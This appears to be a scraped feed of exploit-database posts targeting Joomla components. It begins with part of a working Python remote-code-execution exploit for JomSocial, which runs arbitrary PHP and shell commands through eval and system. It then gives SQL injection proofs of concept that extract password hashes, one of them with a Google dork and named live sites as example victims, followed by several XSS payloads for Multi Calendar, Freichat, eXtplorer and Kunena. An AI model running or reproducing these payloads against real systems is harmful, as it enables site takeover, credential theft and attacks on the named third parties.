exploit_request_data = 'option=community&no_html=1&task=azrul_ajax&func=photos,ajaxUploadAvatar&{0}=1&arg2=["_d_","Event"]&arg3=["_d_","374"]&arg4=["_d_","{1}"]'
json_data = '{{"call":["CStringHelper","escape", "{1}","{0}"]}}'
def __init__(self, url, user_agent = None, use_eval = True):
self.url = url
self._set_user_agent(user_agent)
self.use_eval = use_eval
self.token_regex = re.compile('<input type=\"hidden\" name=\"([\w\d]{32})\" value=\"1\" \/>')
self.cookie, self.token = self._retrieve_token()
self.result_regex = re.compile('method=\\\\"POST\\\\" enctype=\\\\"multipart\\\\/form-data\\\\"><br>(.*)<div id=\\\\"avatar-upload\\\\">', re.DOTALL)
self.command_regex = re.compile('(.*)\\[\\["as","ajax_calls","d",""\\]', re.DOTALL)
def _set_user_agent(self, user_agent):
self.user_agent = user_agent
def _make_opener(self, add_cookie = True):
opener = urllib2.build_opener()
if add_cookie:
opener.addheaders.append(('Cookie', self.cookie))
opener.addheaders.append(('Referer', self.url))
if self.user_agent:
opener.addheaders.append(('User-Agent', self.user_agent))
return opener
def _retrieve_token(self):
opener = self._make_opener(False)
sys.stdout.write('[i] Retrieving cookies and anti-CSRF token... ')
sys.stdout.flush()
req = opener.open(self.url, Exploit.token_request_data)
data = req.read()
token = self.token_regex.findall(data)
if len(token) < 1:
print 'Failed'
raise Exception("Could not retrieve anti-CSRF token")
print 'Done'
return (req.headers['Set-Cookie'], token[0])
def _do_call_function(self, function, parameter):
parameter = parameter.replace('"', '\\"')
json_data = Exploit.json_data.format(function, parameter)
json_data = urllib2.quote(json_data)
data = Exploit.exploit_request_data.format(self.token, json_data)
opener = self._make_opener()
req = opener.open(self.url, data)
if function == 'assert':
return req.read()
elif function in ['system', 'passthru']:
result = self.command_regex.findall(req.read())
if len(result) == 1:
return result[0]
else:
return "[+] Error executing command."
else:
result = self.result_regex.findall(req.read())
if len(result) == 1:
return result[0].replace('\\/', '/').replace('\\"', '"').replace('\\n', '\n')
else:
return "[+] Error executing command."
def call_function(self, function, parameter):
if self.use_eval:
return self.eval("echo {0}('{1}')".format(function, parameter))
else:
return self._do_call_function(function, parameter)
def disabled_functions(self):
return self.call_function("ini_get", "disable_functions")
def test_injection(self):
result = self.eval("echo 'HELLO' . ' - ' . 'WORLD';")
if 'HELLO - WORLD' in result:
print "[+] Code injection using eval works"
else:
print "[+] Code injection doesn't work. Try executing shell commands."
def eval(self, code):
if code [-1] != ';':
code = code + ';'
return self._do_call_function('assert', "@exit(@eval(@base64_decode('{0}')));".format(code.encode('base64').replace('\n', '')))
parser = argparse.ArgumentParser(
description="JomSocial >= 2.6 - Code execution exploit"
)
parser.add_argument('-u', '--url', help='the base URL', required=True)
parser.add_argument(
'-p',
'--php-code',
help='the PHP code to execute. Use \'-\' to read from stdin, or provide a file path to read from')
parser.add_argument('-s', '--shell-command', help='the shell command to execute')
parser.add_argument('-c', '--shell-function', help='the PHP function to use when executing shell commands', default="system")
parser.add_argument('-t', '--test', action='store_true', help='test the PHP code injection using eval', default=False)
parser.add_argument('-n', '--no-eval', action='store_false', help='don\'t use eval when executing shell commands', default=True)
args = parser.parse_args()
if not args.test and not args.php_code and not args.shell_command:
print '[-] Need -p, -t or -s to do something...'
exit(1)
url = args.url
try:
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
exploit = Exploit(url, use_eval=args.no_eval)
if args.test:
exploit.test_injection()
elif args.php_code:
code = args.php_code
if args.php_code == '-':
print '[i] Enter the code to be executed:'
code = sys.stdin.read()
elif os.path.isfile(code):
try:
fd = open(code)
code = fd.read()
fd.close()
except Exception:
print "[-] Error reading the file."
exit(1)
print '[+] Executing PHP code...'
print exploit.eval(code)
elif args.shell_command:
print exploit.call_function(args.shell_function, args.shell_command)
except Exception as ex:
print '[+] Error: ' + str(ex) |
(48)
↧
↧
Joomla 3.2.1 SQL Injection
# Exploit Title: Joomla 3.2.1 sql injection # Date: 05/02/2014 # Exploit Author: kiall-9@mail.com # Vendor Homepage: http://www.joomla.org/ # Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip # Version: 3.2.1 (default installation with Test sample data) # Tested on: Virtualbox (debian) + apache POC=> http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\ will cause an error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT `t`.`id` FROM `k59cv_tags` AS t INNER JOIN `k59cv_contentitem_tag_map` AS m ON `m`.`tag_id` = `t`.`id` AND `m`.`type_alias` = 'com_weblinks.categories' AND `m`.`content_item_id` IN ( \) Array ( [type] => 8 [message] => Undefined offset: 0 [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php [line] => 203 ) I modified the original error.php file with this code --- <?php print_r(error_get_last()); ?> --- in order to obtain something useful. ;-) Now i can easily exploit this flaw: http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29 and obtain the hash: 1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT `m`.`tag_id`,`m`.`core_content_id`,`m`.`content_item_id`,`m`.`type_alias`,COUNT( `tag_id`) AS `count`,`t`.`access`,`t`.`id`,`ct`.`router`,`cc`.`core_title`,`cc`.`core_alias`,`cc`.`core_catid`,`cc`.`core_language` FROM `k59cv_contentitem_tag_map` AS `m` INNER JOIN `k59cv_tags` AS `t` ON m.tag_id = t.id INNER JOIN `k59cv_ucm_content` AS `cc` ON m.core_content_id = cc.core_content_id INNER JOIN `k59cv_content_types` AS `ct` ON m.type_alias = ct.type_alias WHERE `m`.`tag_id` IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (`m`.`content_item_id` <> 0 ) union select password from `k59cv_users` -- ) OR `m`.`type_alias` <> 'com_weblinks.categories') AND `cc`.`core_state` = 1 GROUP BY `m`.`core_content_id` ORDER BY `count` DESC LIMIT 0, 5 CheerZ> |
(21)
↧
Joomla Wire Immogest SQL Injection
************************************************** IIIIIIII RRRRRRRRRRRR HHHHHHHH HHHHHHHH IIII RRRR RRRR HHHH HHHH IIII RRRR RRRR HHHH HHHH IIII RRRR RRRR HHHH HHHH IIII RRRR RRRR HHHH HHHH IIII RRRRRRRRRR HHHHHHHHHHHHHHHH IIII RRRR RRRR HHHH HHHH IIII RRRR RRRR HHHH HHHH IIII RRRR RRRR HHHH HHHH IIII RRRR RRRR HHHH HHHH IIIIIIII RRRRRRRR RRRRRR HHHHHHHH HHHHHHHH *************************************************** # Exploit Title: Joomla com_wire_immogest SQL Injection vulnerabilities # Google Dork: inurl:index.php?option=com_wire_immoges or allinurl:index.php?option=com_wire_immoges # Date: 2014 # Exploit Author: MR.XpR # Tested on: 7 , Kali # CVE : OSVDB-ID: 87868 # Screen Shot : http://cld.persiangig.com/cfs/rest/documents/39410/preview?size=large *************************************************** Exploit : index.php?option=com_wire_immogest&view=object&id=[sqli] Injetion Demo : http://www.victim.com/index.php?option=com_wire_immogest&view=object&id=999++/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+ Example Site : http://www.immobiliareoikia.it/index.php?option=com_wire_immogest&view=object&id=3%27 http://www.subitoecasa.it/index.php?option=com_wire_immogest&view=object&id=1163%27 *************************************************** TnX To : MojiRider,V30sharp,Black.viper,Zer0killer,SecretWalker,FarBodEzrail,Amirio,AL1R3Z4,3is@,Mr.a!i,Mr.3ler0n,Irblackhat,inj3ct0r,3inst3in,Remot3r,IRH Member ./IRaNHaCK.org |
(118)
↧
Joomla Multi Calendar 4.0.2 Cross Site Scripting
Hello,
Multiple cross-site scripting (XSS) vulnerabilities in Multi
calendar 4.0.2 component for Joomla! allow remote attackers to inject arbitrary
web script or HTML code via (1) the calid parameter to index.php or (2) the paletteDefault
parameter to index.php.
File: /tmpl/layout_editevent.php
Lines: 161 and 481
POC:
http://site/index.php?option=com_multicalendar&task=editevent&calid=1";</script><script>alert('XSS');</script>
File: /tmpl/layout_editevent.php
Line: 319
POC:
http://site/index.php?option=com_multicalendar&task=editevent&paletteDefault=1"</script><script>alert('XSS');</script>
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.
Best Regards. |
(159)
↧
Joomla Freichat Cross Site Scripting
Hello,
Multiple cross-site scripting (XSS) vulnerabilities in Freichat
component for Joomla! allow remote attackers to inject
arbitrary web script or HTML code via (1) the id or xhash parameters to
/client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php.
File: /client/chat.php
Line: 53
POC:
http://site/client/chat.php?id=1"
></script><script>alert('XSS
1')</script>&xhash=1" <script>alert('XSS
2')</script>
File: /client/plugins/upload/upload.php
Line: 91
POC:
</style>
<body>
<div
class="frei_upload_border">
<form name="upload"
action="http://site/client/plugins/upload/upload.php"
method="post" enctype="multipart/form-data">
<label
for="file">choose file to send</label><br/><br/>
<input id ="fromid"
type="hidden" name="fromid"/>
<input id="fromname"
type="hidden" name="fromname"/>
<input id="toid"
type="hidden" name="toid"/>
<!--
<input id="toname" type="hidden"
name="toname"/> -->
<input id="toname"
type="hidden" name="toname"
value="<script>alert('XSS')</script>"/>
<input type="file"
name="file" id="file" value="a.jpeg" />
<br /><br/>
<input class ="frei_upload_button"
type="submit" name="submit" value="Send" />
</form>
</div>
</body></html>
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.
Best Regards. |
(86)
↧
↧
Joomla eXtplorer 2.1.3 Cross Site Scripting
Hello,
Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer
2.1.3 component for Joomla! allow remote attackers to inject arbitrary web
script or HTML code via a crafted string inthe URL
to application.js.php, admin.php, copy_move.php,
functions.php, header.php and upload.php.
File: /scripts/application.js.php
Line: 45
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
File: /include/admin.php
Lines: 72, 143, 176 and 210
POC:
http://site/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin
File: /include/copy_move.php
Line: 158
POC:
http://site/administrator/index.php/<img src=x
onerror=alert('XSS')
>?option=com_extplorer&tmpl=component&action=post&do_action=copy
File: /include/functions.php
Line: 933
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
File: /include/header.php
Line: 73
POC:
http://site/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
File: /include/upload.php
Lines: 191 and 259
POC:
http://site/administrator/index.php/<img src=x:alert(alt)
onerror=eval(src)
alt=XSS>?option=com_extplorer&tmpl=component&action=upload
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of
Technology's Scientific Excellence and Research Centers.
Best Regards. |
(92)
↧
Joomla Kunena 3.0.4 Cross Site Scripting
Persistent XSS in Joomla::Kunena 3.0.4
26. February 2014
by Qoppa
+++ Description
"Kunena is the leading Joomla forum component. Downloaded more than 3,750,000 times in nearly 6 years."
Kunena is written in PHP. Users can post a Google Map using the following BBCode
[map]content[/map]
Kunena creates a JavaScript based on input, but doesn't decode it correctly.
+++ Analysis
Vulnerable function in \bbcode\bbcode.php (lines 1049-1116)
1049 function DoMap($bbcode, $action, $name, $default, $params, $content) {
...
1078 $document->addScriptDeclaration("
1079 // <![CDATA[
...
1097 var contentString = '<p><strong>".JText::_('COM_KUNENA_GOOGLE_MAP_NO_GEOCODE', true)." <i>".json_encode($content)."</i></strong></p>';
...
1112 // ]]>"
1113 );
Single quotes remain untouched in $content, so it's possible to break out of encapsulation.
+++ PoC Exploit
[map]'}});}});alert('XSS');(function(){{(function(){{var v='[/map] |
(23)
↧
Joomla Youtube Gallery 4.1.7 SQL Injection
# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960
Detail:
In line: 40, file: components\com_youtubegallery\models\gallery.php,
if parameter listid is int (or can cast to int), $listid and $themeid
will not santinized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42: //Shadow Box
43: $listid=JRequest::getVar('listid');
44:
45:
46: //Get Theme
47: $m_themeid=(int)JRequest::getVar('mobilethemeid');
48: if($m_themeid!=0)
49: {
50: if(YouTubeGalleryMisc::check_user_agent('mobile'))
51: $themeid=$m_themeid;
52: else
53: $themeid=JRequest::getVar('themeid');
54: }
55: else
56: $themeid=JRequest::getVar('themeid');
57: }
After, $themeid and $listid are used in line 86, 92. Two method
getVideoListTableRow and getThemeTableRow concat string to construct
sql query. So it is vulnerable to SQL Injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88: echo '<p>No video found</p>';
89: return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94: echo '<p>No video found</p>';
95: return false;
96: }
# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700 |
(156)
↧